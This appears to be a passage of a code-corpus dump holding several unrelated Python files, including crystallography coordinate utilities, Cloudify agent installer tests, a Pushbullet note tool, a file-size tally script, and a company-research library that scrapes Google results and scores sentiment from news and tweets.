        for partner in distlist2:
            partnertype = int(atomlist2[distlist2.index(partner)][0][1])
            if atomtype == partnertype:
                partnervalue = 0
                for key in partner.keys():
                    for element in range(len(atom[key])):  # range: Py3-compatible (was xrange)
                        partnervalue += abs(atom[key][element] - partner[key][element])
            else:
                partnervalue = 9999999  # sentinel: never match different elements
            valuelist.append(partnervalue)
        hitlist.append(valuelist.index(min(valuelist)))
    # BUG FIX: the original built hitlist but never returned it.
    return hitlist
def read_multiple_coordinates(fragmentnames):
    """
    Call read_coordinates and frac_to_cart for every path=name in
    fragmentnames and return a dictionary keying each fragment name to the
    atom list returned by frac_to_cart.
    """
    fragdict = {}
    for name in fragmentnames:
        path = name + '/'
        # BUG FIX: read_coordinates returns three values (cell, positions,
        # sorted key list); the original two-name unpack raised ValueError.
        cell, pos, _ = read_coordinates(path)
        # (the original also built an unused per-atom dict here — removed)
        fragdict[name] = frac_to_cart(cell, pos)
    return fragdict
##def read_coordinates(path=''):
## """
## Reads the cell parameters from a 'xd.mas' file and the atomic positions
## from a 'xd.res' file.
## The function returns a list with the cell parameters and an dictionary which
## keys the atom name to its fractional coordinates.
## """
## maspointer=open(path+'xd.mas','r')
## respointer=open(path+'xd.res','r')
## positions={}
## keylist=[] #Needed to keep the atomlist order. This is important for the frequency read function.
## for line in maspointer.readlines():
## if 'CELL' in line:
## cell=[float(i) for i in line.split(" ") if '.' in i]
## for line in respointer.readlines():
## if '(' in line and not '!' in line:
## coords=[float(i) for i in line.split(" ") if '.' in i]
## coords=coords[:-1]
## key=line.split(" ")[0]
## keylist.append(key)
## positions[key]=coords
## sortkeylist=[]
## for i in xrange(len(keylist)):
## j=i+1
## for key in keylist:
## if j==int(key[2:-1]):
## sortkeylist.append(key)
## return cell,positions,sortkeylist
def read_xd_master_file(path, errorpointer):
    """
    Return the compound name and the cell parameters from a xd.mas style
    file specified by 'path'.

    On a file missing either the TITLE or the CELL record, the path is
    written to errorpointer and (None, None) is returned — same contract as
    before, but without a bare ``except:``.
    """
    compound_name = None
    cell = None
    with open(path, 'r') as filepointer:  # with: the handle is always closed
        for line in filepointer:
            if 'TITLE' in line:
                # compound name is everything after the '!' marker
                compound_name = line.partition('!')[2].lstrip().rstrip()
            if 'CELL' in line:
                cell = [float(i) for i in line.split(" ") if '.' in i]
                break
    if compound_name is None or cell is None:
        errorpointer.write(path + '\n')
        return None, None
    return compound_name, cell
def read_xd_parameter_file(path, sort=False):
    """
    Read atomic positions from an xd.res style file.

    Returns (positions, keylist): positions keys each atom name to its
    coordinates (the trailing non-coordinate column is dropped); keylist
    preserves file order, or — when sort=True — is ordered by the number
    inside the atom-name parentheses.
    """
    positions = {}
    keylist = []
    # with: the file handle is closed (the original leaked it)
    with open(path, 'r') as respointer:
        for line in respointer:
            if '(' in line and not '!' in line:
                coords = [float(i) for i in line.split(" ") if '.' in i]
                coords = coords[:-1]  # drop the trailing column
                key = line.split(" ")[0]
                keylist.append(key)
                positions[key] = coords
    if sort:
        # select keys numbered 1..n in order (assumes exactly those numbers)
        sortkeylist = []
        for i in range(len(keylist)):  # range: Py3-compatible (was xrange)
            j = i + 1
            for key in keylist:
                if j == int(get_number(key)):
                    sortkeylist.append(key)
    else:
        sortkeylist = keylist
    return positions, sortkeylist
def read_coordinates(path='', sort=True):
    """
    Read the cell parameters from a 'xd.mas' file and the atomic positions
    from a 'xd.res' file in `path` (must end with a path separator).

    Returns (cell, positions, keylist): the cell parameters, a dict keying
    each atom name to its fractional coordinates, and the atom names —
    ordered by the number in the name when sort=True, else in file order.
    The order matters for the frequency read function.
    """
    cell = None
    positions = {}
    keylist = []
    # with: both file handles are closed (the original leaked them)
    with open(path + 'xd.mas', 'r') as maspointer:
        for line in maspointer:
            if 'CELL ' in line:
                cell = [float(i) for i in line.split(" ") if '.' in i]
                break  # only the first CELL record is needed
    with open(path + 'xd.res', 'r') as respointer:
        for line in respointer:
            if '(' in line and not '!' in line:
                coords = [float(i) for i in line.split(" ") if '.' in i]
                coords = coords[:-1]  # drop the trailing column
                key = line.split(" ")[0]
                keylist.append(key)
                positions[key] = coords
    if sort:
        # select keys numbered 1..n in order (assumes exactly those numbers)
        sortkeylist = []
        for i in range(len(keylist)):  # range: Py3-compatible (was xrange)
            j = i + 1
            for key in keylist:
                if j == int(get_number(key)):
                    sortkeylist.append(key)
    else:
        sortkeylist = keylist
    return cell, positions, sortkeylist
def get_number(atomname):
    """
    Return the characters found between parentheses in an atom name,
    concatenated in order (e.g. 'C(12)' -> '12').  Empty string when the
    name contains no parentheses.
    """
    collected = []
    inside = False
    for ch in atomname:
        if ch == ')':
            inside = False
        if inside:
            collected.append(ch)
        if ch == '(':
            inside = True
    return ''.join(collected)
def frac_to_cart(cell, positions):
    """
    Transform a set of fractional coordinates to cartesian coordinates.

    `cell` is [a, b, c, alpha, beta, gamma] with the angles in degrees;
    `positions` is the name -> fractional-coordinates dict returned by
    read_coordinates().  Returns a list of
    [[name, atomtable[element_letter]], cartesian_array] entries.
    (atomtable is a module-level lookup defined elsewhere in this file.)
    """
    atomlist = []
    a, b, c = cell[0], cell[1], cell[2]
    alpha, beta, gamma = cell[3] / 180 * np.pi, cell[4] / 180 * np.pi, cell[5] / 180 * np.pi
    # volume factor of the standard fractional->cartesian transformation
    v = np.sqrt(1 - np.cos(alpha) * np.cos(alpha) - np.cos(beta) * np.cos(beta) - np.cos(gamma) * np.cos(gamma)
                + 2 * np.cos(alpha) * np.cos(beta) * np.cos(gamma))
    # np.array instead of the deprecated np.matrix; np.dot then yields a
    # plain 1-D vector, and .flatten().tolist() still produces the same list
    transmatrix = np.array([[a, b * np.cos(gamma), c * np.cos(beta)],
                            [0, b * np.sin(gamma), c * (np.cos(alpha) - np.cos(beta) * np.cos(gamma)) / np.sin(gamma)],
                            [0, 0, c * v / np.sin(gamma)]])
    for atom in positions:
        coordmatrix = np.dot(transmatrix, positions[str(atom)])
        coordmatrix = np.array(coordmatrix).flatten().tolist()
        atomlist.append([])
        atomlist[-1].append([atom, atomtable[atom[0]]])
        atomlist[-1].append(np.array(coordmatrix))
    # (the original kept an unused `counter` variable — removed)
    return atomlist
def list_to_dict(atomlist, full=False):
    """
    Key the coordinates of the atoms read from xd.res to the atom name.

    With full=True each entry is [name, coords]; otherwise each entry is
    [[name, type], coords] and only the name is used as the key.
    """
    if full:
        return {entry[0]: entry[1] for entry in atomlist}
    return {entry[0][0]: entry[1] for entry in atomlist}
#===============================================================================
# def link_atoms(gatomlist,xatomdict):
# """
# Returns a list of pairs of equivalten atoms.
# """
# linklist=[]
# keylist=xatomdict.keys()
# for atom in xrange(len(gatomlist)):
# for key in keylist:
# if int(key)==atom+1:
# linklistline=[atomlist[atom][1],xatomdict[key]]
# linklist.append(linklistline)
# break
# return linklist
#===============================================================================
#===============================================================================
# def get_random_plane(linklist):
# """
# Randomly picks three atoms to build a plane from.
# """
# planepoints=random.sample(linklist,3)
# gplanenorm=get_normal_vector_of_plane(planepoints[0][0],planepoints[1][0],planepoints[2][0])
# gplanedir=np.linalg.norm(planepoints[0][0]-planepoints[1][0])
# xplanenorm=get_normal_vector_of_plane(planepoints[0][1],planepoints[1][1],planepoints[2][1])
# xdplanedir=np.linalg.norm(planepoints[0][1]-planepoints[1][1])
# return gplanenorm,xplanenorm
#===============================================================================
def get_angle(v1, v2):
    """
    Return the angle (in radians) between two vectors.

    Generalized from the original, which computed arccos of the raw dot
    product and was therefore only correct for unit vectors (and could
    return NaN when rounding pushed the dot product outside [-1, 1]).
    The dot product is now normalized and clipped; for already-normalized
    inputs the result is unchanged.
    """
    cosine = np.dot(v1, v2) / (np.linalg.norm(v1) * np.linalg.norm(v2))
    return np.arccos(np.clip(cosine, -1.0, 1.0))
def read_invout_database(path):
    """
    Parse `path`/Invariome.out and return a dict mapping each name to its
    invariom name.  Lines are expected as 'name: invname'; the trailing
    character of each field (colon / newline) is stripped.
    """
    invnames = {}
    # with: the file handle is closed (the original leaked it)
    with open(path + 'Invariome.out', 'r') as filepointer:
        for line in filepointer:
            splitted = line.split(' ')
            if len(splitted) < 2:
                continue  # skip blank/malformed lines (original raised IndexError)
            invnames[splitted[0][:-1]] = splitted[1][:-1]
    return invnames
|
7,937 | 703ed320e7c06856a0798d9c0de9aafe24458767 | from entities.GpsFix import GpsFix
class Visit(object):
    """
    A Visit, which represents an arrival-departure to a stay point.

    Attributes:
        id_visit: the id of the visit itself
        id_stay_point: the id of the stay point
        pivot_arrival_fix: the GpsFix that corresponds to real world arrival
        pivot_departure_fix: the GpsFix that corresponds to real world departure
        detection_arrival_fix: the GpsFix that triggered the arrival by the platform
        detection_departure_fix: the GpsFix that triggered the departure by the platform
        stay_time: stay time of the visit in seconds
    """
    def __init__(self, id_visit, id_stay_point, pivot_arrival_fix: GpsFix, pivot_departure_fix: GpsFix,
                 detection_arrival_fix: GpsFix,
                 detection_departure_fix: GpsFix):
        """
        Build a Visit object.

        :param id_visit: the id of the visit
        :param id_stay_point: the id of the stay point
        :param pivot_arrival_fix: the GpsFix that corresponds to real world arrival
        :param pivot_departure_fix: the GpsFix that corresponds to real world departure
        :param detection_arrival_fix: the GpsFix that triggered the arrival by the platform
        :param detection_departure_fix: the GpsFix that triggered the departure by the platform
        """
        self.id_visit = id_visit
        self.id_stay_point = id_stay_point
        self.pivot_arrival_fix = pivot_arrival_fix
        self.pivot_departure_fix = pivot_departure_fix
        self.detection_arrival_fix = detection_arrival_fix
        self.detection_departure_fix = detection_departure_fix
        self.stay_time = None
        self.update_stay_time()
    def update_stay_time(self):
        """
        Recompute and cache the stay time of the visit.

        :return: None
        """
        self.stay_time = self.get_length()
    def get_length(self) -> int:
        """
        Length of the visit in seconds (pivot departure minus pivot arrival).
        Note: timedelta.total_seconds() actually yields a float.

        :return: The length of visit in seconds
        """
        delta = self.pivot_departure_fix.timestamp - self.pivot_arrival_fix.timestamp
        return delta.total_seconds()
    def __str__(self):
        """CSV-style rendering: id, stay point, arrival, departure, length."""
        date_format = '%Y-%m-%d %H:%M:%S'
        fields = (self.id_visit,
                  self.id_stay_point,
                  self.pivot_arrival_fix.timestamp.strftime(date_format),
                  self.pivot_departure_fix.timestamp.strftime(date_format),
                  self.get_length())
        return '{},{},{},{},{}'.format(*fields)
|
7,938 | eed3ec2897d4da20b576cb4e2ce95331ae223f76 | #########
# Copyright (c) 2015 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import shutil
import tempfile
import uuid
from mock import patch
from cloudify.workflows import local
from cloudify.utils import setup_logger
from cloudify_agent.tests import resources
from cloudify_agent.tests.utils import (
FileServer,
get_source_uri,
get_requirements_uri)
from cloudify_agent.tests.api.pm import BaseDaemonLiveTestCase
from cloudify_agent.tests.api.pm import only_ci, only_os
from cloudify_agent.api import utils
##############################################################################
# these tests run a local workflow to install the agent on the local machine.
# it should support both windows and linux machines. and thus, testing the
# LocalWindowsAgentInstaller and LocalLinuxAgentInstaller.
# the remote use cases are tested as system tests because they require
# actually launching VM's from the test.
##############################################################################
class AgentInstallerLocalTest(BaseDaemonLiveTestCase):
    """
    these tests run local workflows in order to invoke the installer
    operations. the remote use case is tested as part of the system tests.
    """
    @classmethod
    def setUpClass(cls):
        # Shared fixtures for the whole class: a logger plus the agent
        # source / requirements URIs used as blueprint inputs below.
        cls.logger = setup_logger(cls.__name__)
        cls.source_url = get_source_uri()
        cls.requirements_file = get_requirements_uri()
    def setUp(self):
        # Serve a temporary directory over HTTP so the blueprints can fetch
        # their resources; cleanups run in reverse registration order
        # (stop the server, then delete the directory).
        super(AgentInstallerLocalTest, self).setUp()
        self.resource_base = tempfile.mkdtemp(
            prefix='file-server-resource-base')
        self.fs = FileServer(
            root_path=self.resource_base)
        self.fs.start()
        self.addCleanup(self.fs.stop)
        self.addCleanup(shutil.rmtree, self.resource_base)
    # patch.dict keeps agent_packager's logging setup from disabling the
    # already-configured test loggers; _validate_node is mocked so the local
    # workflow skips blueprint node validation.
    @patch.dict('agent_packager.logger.LOGGER',
                disable_existing_loggers=False)
    @patch('cloudify.workflows.local._validate_node')
    @only_ci
    def test_local_agent_from_package(self, _):
        """Install then uninstall a local agent built from an agent package."""
        agent_name = utils.internal.generate_agent_name()
        agent_queue = '{0}-queue'.format(agent_name)
        blueprint_path = resources.get_resource(
            'blueprints/agent-from-package/local-agent-blueprint.yaml')
        self.logger.info('Initiating local env')
        inputs = {
            'resource_base': self.resource_base,
            'source_url': self.source_url,
            'requirements_file': self.requirements_file,
            'name': agent_name,
            'queue': agent_queue,
            'file_server_port': self.fs.port
        }
        env = local.init_env(name=self._testMethodName,
                             blueprint_path=blueprint_path,
                             inputs=inputs)
        # install must leave a live daemon; uninstall must kill it
        env.execute('install', task_retries=0)
        self.assert_daemon_alive(name=agent_name)
        env.execute('uninstall', task_retries=1)
        self.wait_for_daemon_dead(name=agent_name)
    @only_os('posix')
    @patch('cloudify.workflows.local._validate_node')
    @only_ci
    def test_local_agent_from_package_long_name(self, _):
        """Agent still works with a filepath longer than 128 bytes
        Paths longer than 128 bytes break shebangs on linux.
        """
        # four hex UUIDs make the name (and thus the agent path) very long
        agent_name = 'agent-' + ''.join(uuid.uuid4().hex for i in range(4))
        agent_queue = '{0}-queue'.format(agent_name)
        blueprint_path = resources.get_resource(
            'blueprints/agent-from-package/local-agent-blueprint.yaml')
        self.logger.info('Initiating local env')
        inputs = {
            'resource_base': self.resource_base,
            'source_url': self.source_url,
            'requirements_file': self.requirements_file,
            'name': agent_name,
            'queue': agent_queue,
            'file_server_port': self.fs.port
        }
        env = local.init_env(name=self._testMethodName,
                             blueprint_path=blueprint_path,
                             inputs=inputs)
        env.execute('install', task_retries=0)
        self.assert_daemon_alive(name=agent_name)
        env.execute('uninstall', task_retries=1)
        self.wait_for_daemon_dead(name=agent_name)
    @only_ci
    @patch('cloudify.workflows.local._validate_node')
    @patch.dict('agent_packager.logger.LOGGER',
                disable_existing_loggers=False)
    def test_local_agent_from_source(self, _):
        """Install then uninstall a local agent built from source."""
        agent_name = utils.internal.generate_agent_name()
        agent_queue = '{0}-queue'.format(agent_name)
        inputs = {
            'source_url': self.source_url,
            'requirements_file': self.requirements_file,
            'name': agent_name,
            'queue': agent_queue
        }
        blueprint_path = resources.get_resource(
            'blueprints/agent-from-source/local-agent-blueprint.yaml')
        self.logger.info('Initiating local env')
        env = local.init_env(name=self._testMethodName,
                             blueprint_path=blueprint_path,
                             inputs=inputs)
        env.execute('install', task_retries=0)
        self.assert_daemon_alive(name=agent_name)
        env.execute('uninstall', task_retries=1)
        self.wait_for_daemon_dead(name=agent_name)
    @only_ci
    @patch('cloudify.workflows.local._validate_node')
    @patch.dict('agent_packager.logger.LOGGER',
                disable_existing_loggers=False)
    def test_3_2_backwards(self, _):
        """Same from-source flow against the 3.2-compatibility blueprint."""
        agent_name = utils.internal.generate_agent_name()
        agent_queue = '{0}-queue'.format(agent_name)
        inputs = {
            'source_url': self.source_url,
            'requirements_file': self.requirements_file,
            'name': agent_name,
            'queue': agent_queue
        }
        blueprint_path = resources.get_resource(
            'blueprints/3_2-agent-from-source/3_2-agent-from-source.yaml')
        self.logger.info('Initiating local env')
        env = local.init_env(name=self._testMethodName,
                             blueprint_path=blueprint_path,
                             inputs=inputs)
        env.execute('install', task_retries=0)
        self.assert_daemon_alive(name=agent_name)
        env.execute('uninstall', task_retries=1)
        self.wait_for_daemon_dead(name=agent_name)
    @only_os('posix')
    @only_ci
    @patch('cloudify.workflows.local._validate_node')
    def test_local_agent_from_source_long_name(self, _):
        """Agent still works with a filepath longer than 128 bytes
        This test won't pass on windows because some files within the
        virtualenv exceed 256 bytes, and windows doesn't support paths
        that long.
        """
        agent_name = 'agent-' + ''.join(uuid.uuid4().hex for i in range(4))
        agent_queue = '{0}-queue'.format(agent_name)
        inputs = {
            'source_url': self.source_url,
            'requirements_file': self.requirements_file,
            'name': agent_name,
            'queue': agent_queue
        }
        blueprint_path = resources.get_resource(
            'blueprints/agent-from-source/local-agent-blueprint.yaml')
        self.logger.info('Initiating local env')
        env = local.init_env(name=self._testMethodName,
                             blueprint_path=blueprint_path,
                             inputs=inputs)
        env.execute('install', task_retries=0)
        self.assert_daemon_alive(name=agent_name)
        env.execute('uninstall', task_retries=1)
        self.wait_for_daemon_dead(name=agent_name)
|
7,939 | 66cc9ca3d8cbe9690da841e43cef217f3518122c | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import functools
import os
import platform
import sys
import webbrowser
import config
from pushbullet import Pushbullet
class Zui:
    """Interactive console that pushes typed notes to a Pushbullet device."""
    def __init__(self):
        self.pb = Pushbullet(self.api_key())
        self.target = self.make_devices()
        self.dayone = config.URL_SCHEME
        self.clear, self.pause = self.check_platform()
    def api_key(self):
        """Return the configured API key, prompting for (and saving) one if absent."""
        if config.API_KEY:
            return config.API_KEY
        else:
            webbrowser.open('https://www.pushbullet.com/account')
            API_KEY = input('Copy and Paste Access Token: ')
            self.config_setting(API_KEY)
            return API_KEY
    def config_setting(self, api_key):
        """Persist api_key into config.py (assumes API_KEY is on the first line)."""
        with open('config.py', 'r') as rf:
            setting = rf.readlines()
        setting[0] = 'API_KEY = "{0}"\n'.format(api_key)
        with open('config.py', 'w') as wf:
            wf.writelines(setting)
            wf.flush()
    def make_devices(self):
        """Return the Pushbullet device named config.PUSH_TARGET, creating it on demand."""
        for d in self.pb.devices:
            if config.PUSH_TARGET == d.nickname:
                return d
        new_device = self.pb.new_device(config.PUSH_TARGET)
        # model argument was not used, only nickname
        self.pb.edit_device(
            new_device,
            nickname=config.PUSH_TARGET,
            model=config.PUSH_TARGET
        )
        # BUG FIX: the original discarded the recursive result, so the
        # freshly created device was never returned (caller got None).
        return self.make_devices()
    def clear_notepad(f):
        """Decorator: clear the terminal before and after running f."""
        # BUG FIX: the original called functools.wraps(f) without applying
        # the returned decorator to the wrapper.
        @functools.wraps(f)
        def wraps(*args):
            os.system(args[0].clear)
            result = f(*args)
            os.system(args[0].clear)
            return result
        return wraps
    @clear_notepad
    def push_to_dayone(self):
        '''Pushbullet couldn't link then whitespace in URL.
        So, it doesn't push_link, just push_note.
        Unavilable DayOne URL shceme.
        '''
        try:
            # body = self.dayone + self.notepad()
            body = self.notepad()
            return self.pb.push_note('', body, device=self.target)
        except KeyboardInterrupt:
            return False
    def notepad(self):
        """Read multi-line input from stdin until EOF and return it as one string."""
        print('Push: {}, Close: C-c'.format(self.pause))
        return ''.join(sys.stdin.readlines())
    def check_platform(self):
        """Return (clear-screen command, EOF key label) for the current OS."""
        # NOTE(review): raises KeyError on platforms other than Windows and
        # macOS (e.g. Linux) — confirm whether that is acceptable.
        cp = {
            'Windows': ('CLS', 'C-z'),
            'Darwin': ('clear', 'C-d'),
        }
        return cp[platform.system()]
def main():
    """Run the interactive push loop until the user closes the session."""
    session = Zui()
    while True:
        if not session.push_to_dayone():
            break
    print('Bye.')


if __name__ == '__main__':
    main()
|
7,940 | 06aa2d261e31dfe2f0ef66dca01c1fe3db1ca94e |
import os, sys

# Report, per filename suffix, the number of files and their total size (TiB)
# under a directory tree.  Usage: script.py <top_dir> <max_rows>
top = sys.argv[1]
max_rows = int(sys.argv[2])  # renamed: the original shadowed the builtin `max`

# suffix -> [file count, total size in TiB]
cnts = {}
for d, dirs, files in os.walk(top):
    for f in files:
        i = f.find(".")
        if i == -1:
            i = 0  # no dot: the whole name counts as the "suffix" (original behavior)
        suf = f[i:]
        rec = cnts.setdefault(suf, [0, 0])
        fn = d + '/' + f
        if os.path.islink(fn):
            sz = 0  # don't stat symlink targets
        else:
            sz = os.path.getsize(fn)
        rec[0] += 1
        rec[1] += float(sz) / (1024 ** 4)

# One sorted pass (the original rebuilt and re-sorted the list a second time).
recs = sorted([(cnts[k][1], cnts[k][0], k) for k in cnts], reverse=True)
total = sum(rec[0] for rec in recs)  # sums the size field of each tuple
print("Total %.3f" % total)
for sz, cnt, suf in recs[:max_rows]:
    print("%s\t%d\t%.3f" % (suf, cnt, sz))
|
7,941 | 9c7ecd3c878d43633606439aa63f840176f20dee | # Library for Stalker project
#Libraries
import pandas as pd
import seaborn as sns
from IPython.display import Image, display
import matplotlib.pyplot as plt
# Google search
from googlesearch import search
# Tldextract to get domain of url
import tldextract as tld
# BeautifulSoup
from bs4 import BeautifulSoup as bs
from bs4.element import Comment
import urllib.request
# NLTK to analyze webs
import nltk
from nltk.corpus import stopwords
from nltk import FreqDist
from nltk.tokenize import word_tokenize
# Find close matches
from difflib import get_close_matches
# Sentiment analysis
from textblob import TextBlob
# Twitter sentiment analysis
import tweepy
# News API
from newsapi import NewsApiClient
# Credentials
import credentials as cd
# Finding info in APIs
# News API client plus the whitelist of sources queried throughout this module.
newsapi = NewsApiClient(api_key=cd.news_credentials['api_key'])
news_sources = 'the-verge,buzzfeed,engadget,hacker-news,mashable,reddit-r-all,wired,techcrunch'
# Twitter API
# OAuth credentials come from the local `credentials` module (imported as cd).
consumer_key = cd.twitter_credentials['consumer_key']
consumer_key_secret = cd.twitter_credentials['consumer_key_secret']
access_token = cd.twitter_credentials['access_token']
access_token_secret = cd.twitter_credentials['access_token_secret']
auth = tweepy.OAuthHandler(consumer_key, consumer_key_secret)
auth.set_access_token(access_token, access_token_secret)
# module-level tweepy client used by the sentiment helpers below
api = tweepy.API(auth)
# Finding query on Google
# Finding related urls
def find_webs(query):
    """
    Google-search `query` and return up to 10 result URLs, skipping social
    networks and keeping at most one URL per domain.
    """
    rrss = ['facebook', 'twitter', 'linkedin', 'instagram', 'youtube', 'pinterest', 'angel']
    urls = []
    sites = []
    for s in search(query, tld="com", num=30, stop=30, pause=3, lang='en'):
        if len(urls) >= 10:
            # the original kept iterating (and pausing 3s per result) after
            # the ten URLs were already collected
            break
        domain = tld.extract(s).domain
        # the original re-tested the domain inside the social-network loop
        # on every iteration; one combined check is equivalent
        is_excluded = any(rs in s for rs in rrss) or domain in sites
        if not is_excluded and s not in urls:
            urls.append(s)
            sites.append(domain)
    return urls
def tag_visible(element):
    """Return True when a BeautifulSoup text node is user-visible (not inside
    style/script/head/title/meta/[document] and not an HTML comment)."""
    hidden_parents = {'style', 'script', 'head', 'title', 'meta', '[document]'}
    if element.parent.name in hidden_parents:
        return False
    return not isinstance(element, Comment)
def text_from_html(body):
    """Extract the visible text of an HTML document as one space-joined string."""
    soup = bs(body, 'html.parser')
    text_nodes = soup.findAll(text=True)
    return u" ".join(node.strip() for node in text_nodes if tag_visible(node))
def cleaning_urls_text(url):
    """
    Download `url`, extract its visible text and return the list of word
    tokens with English stopwords removed.  Returns [] on any failure
    (network or parse error) — deliberately best-effort.
    """
    try:
        html = text_from_html(urllib.request.urlopen(url).read())
        stop_words = set(stopwords.words('english'))
        word_tokens = word_tokenize(html)
        return [w for w in word_tokens if not w in stop_words]
    except Exception:
        # narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
        # are no longer swallowed; still best-effort for everything else
        return []
def filter_warning_words(sentence):
    """Return the words of `sentence` (in order, with repeats) that belong to
    the crime/warning vocabulary."""
    warning_words = {
        'lie', 'fraud', 'scam', 'extortion', 'deceit', 'crime', 'arson',
        'assault', 'bigamy', 'blackmail', 'bribery', 'burglary', 'child abuse',
        'conspiracy', 'espionage', 'forgery', 'genocide', 'hijacking',
        'homicide', 'kidnapping', 'manslaughter', 'mugging', 'murder',
        'perjury', 'rape', 'riot', 'robbery', 'shoplifting', 'slander',
        'smuggling', 'treason', 'trespassing'}
    return [word for word in sentence if word in warning_words]
def warnings_count(url):
    """Return (url, number of warning words on the page), or None when the
    page contains no warning words."""
    words = cleaning_urls_text(url)
    hits = len(filter_warning_words(words))
    if hits == 0:
        return None
    return (url, hits)
def most_warnings(urls, look_for):
    """
    Print the (up to two) URLs from `urls` that contain the most warning
    words, or a reassuring message about `look_for` when none do.
    """
    list_len_tup = list(map(warnings_count, urls))
    # `is not None` instead of `!= None`: identity check is the Python idiom
    list_len_tup_clean = [item for item in list_len_tup if item is not None]
    list_len_tup_clean.sort(key=lambda item: item[1], reverse=True)
    top_urls = [url for url, length in list_len_tup_clean[:2]]
    if len(top_urls) > 1:
        print(f"""
        We found something sketchy. You might want to check these links:
        - {top_urls[0]}
        - {top_urls[1]}
        """)
    elif len(top_urls) == 1:
        print(f"""
        We found something sketchy. You might want to check this link:
        {top_urls[0]}
        """)
    else:
        print(f"We couldn't find anything worrying about {look_for} on Google. Nice!")
# Input correction
def retrieve_name(my_name, companies):
    """
    Validate `my_name` against the company names in the `companies`
    DataFrame.  Exact matches are returned as-is; otherwise the user is
    asked whether the closest fuzzy match was intended.
    """
    known_names = list(companies.dropna(subset=['name']).name)
    if my_name in known_names:
        return my_name
    matches = get_close_matches(my_name, known_names)
    if matches:
        action = input("Did you mean %s instead? [y or n]: " % matches[0])
        if action == "y":
            return matches[0]
        elif action == "n":
            return my_name
        else:
            return "we don't understand you. Apologies."
def retrieve_sector(my_sector, investments):
    """
    Validate `my_sector` against the category lists in the `investments`
    DataFrame (comma-separated values are split).  Exact matches return
    as-is; otherwise the user is asked about the closest fuzzy match.
    """
    investments = investments.dropna(subset=['raised_amount_usd', 'company_category_list'])
    sector_list = []
    for item in investments['company_category_list']:
        if ',' in item:
            sector_list.extend(item.split(sep=', '))
        else:
            sector_list.append(item)
    if my_sector in sector_list:
        return my_sector
    matches = get_close_matches(my_sector, sector_list)
    if matches:
        action = input("Did you mean %s instead? [y or n]: " % matches[0])
        if action == "y":
            return matches[0]
        else:
            return my_sector
# Sentiment analysis tweeter
def tw_sent_sector(public_tweets, sector):
    """Print the overall TextBlob polarity (Positive/Negative/Neutral) of the
    given tweets about `sector`."""
    total_polarity = sum(TextBlob(tweet.text).sentiment[0] for tweet in public_tweets)
    if total_polarity > 0:
        sent = 'Positive'
    elif total_polarity < 0:
        sent = 'Negative'
    else:
        sent = 'Neutral'
    print(f"The sentiment about {sector} industry in Twitter is {sent}")
# Sentiment analysis news
def news_sentiment_sector(public_news, sector):
    """
    Print the number of recent news articles about `sector` and their overall
    sentiment (TextBlob polarity of every title and description).
    """
    news_list = []
    for piece in range(len(public_news['articles'])):
        news_list.append(TextBlob(public_news['articles'][piece]['title']).sentiment[0])
        news_list.append(TextBlob(public_news['articles'][piece]['description']).sentiment[0])
    if sum(news_list) > 0:
        news_sent = 'Positive'
    elif sum(news_list) < 0:
        news_sent = 'Negative'
    else:
        news_sent = 'Neutral'
    # BUG FIX: the original printed len(public_news) — the number of keys in
    # the API response dict — instead of the number of articles.
    print(f"There have been {len(public_news['articles'])} news pieces about {sector} industry recently and are in general {news_sent}")
# Look for data about sector
def category(sector, investments):
    """
    Print a market overview for `sector`: Twitter and news sentiment plus
    plots and statistics of the investment history from `investments`
    (uses the module-level `api` and `newsapi` clients).
    """
    # Gather tweets
    public_tweets = api.search(sector)
    # Gather news
    public_news = newsapi.get_everything(q=sector,sources=news_sources,language='en')
    # Prepare the data for the sector
    investments = investments.dropna(subset=['company_category_list'])
    sector_investments = investments[investments['company_category_list'].str.contains(sector)].drop('index',axis=1)
    sector_investments.reset_index(drop=True)
    sector_investments['funded_at'] = pd.to_datetime(sector_investments['funded_at'])
    sector_investments['Year'] = sector_investments['funded_at'].apply(lambda x: x.year)
    sector_investments['Month'] = sector_investments['funded_at'].apply(lambda x: x.month)
    sector_investments['Day'] = sector_investments['funded_at'].apply(lambda x: x.day)
    # Sentiment analysis Twitter
    tw_sent_sector(public_tweets, sector)
    # Sentiment analysis News
    news_sentiment_sector(public_news, sector)
    # Yearly totals over the last 10 years and the overall movement (%)
    sector_year = sector_investments.groupby(['Year']).sum()[-10:]
    movement = ((sector_year.raised_amount_usd.iloc[len(sector_year)-1] - sector_year.raised_amount_usd.iloc[0])/sector_year.raised_amount_usd.iloc[0]*100)
    if sector_year.raised_amount_usd.iloc[0] + sector_year.raised_amount_usd.iloc[len(sector_year)-1] >= 0:
        in_dec = 'increased'
        grow = 'growing'
    else:
        in_dec = 'decreased'
        grow = 'falling'
        # BUG FIX: the original did `movement = movement[1:]` here, but
        # `movement` is a float and is not sliceable (TypeError).  The sign
        # is handled by abs(movement) below, so the line was removed.
    sns.lineplot(x=sector_year.index, y=sector_year.raised_amount_usd).set_title(f'Evolution of the amount invested in {sector}')
    investments_per_year = sector_investments.groupby(['Year']).count()
    peak_year = sector_year.index[sector_year['raised_amount_usd'] == max(sector_year.raised_amount_usd)].to_list()
    peak_amount = max(sector_year.raised_amount_usd)
    low_amount = min(sector_year.raised_amount_usd)
    most_invested_companies = sector_investments.groupby(by='company_name').sum().sort_values(by='raised_amount_usd', ascending=False)
    low_year = sector_year.index[sector_year['raised_amount_usd'] == min(sector_year.raised_amount_usd)].to_list()
    format_doll = ',.2f'
    print(f"""The amount of money invested in {sector} companies has {in_dec} by {format(abs(movement),format_doll)}% in the last {len(sector_year)} years.
    It peaked in year {peak_year[0]} with ${format(peak_amount,format_doll)} invested and its lowest point was in year {low_year[0]} with ${format(low_amount,format_doll)} invested.
    """)
    plt.ylabel('Raised amount in USD')
    plt.show()
    sns.lineplot(x=investments_per_year.index[-10:], y=investments_per_year.Day[-10:]).set_title(f'Evolution of the number of investment in {sector}')
    plt.ylabel('Number of investments')
    # BUG FIX: a leftover `""")` from a commented-out print swallowed the
    # following plt.show() into a dead string literal, so the second plot
    # was never displayed.
    plt.show()
    # (commented-out "Top 3 companies" report from the original, kept for reference)
    # print(f"The Top 3 companies with biggest investments are: "
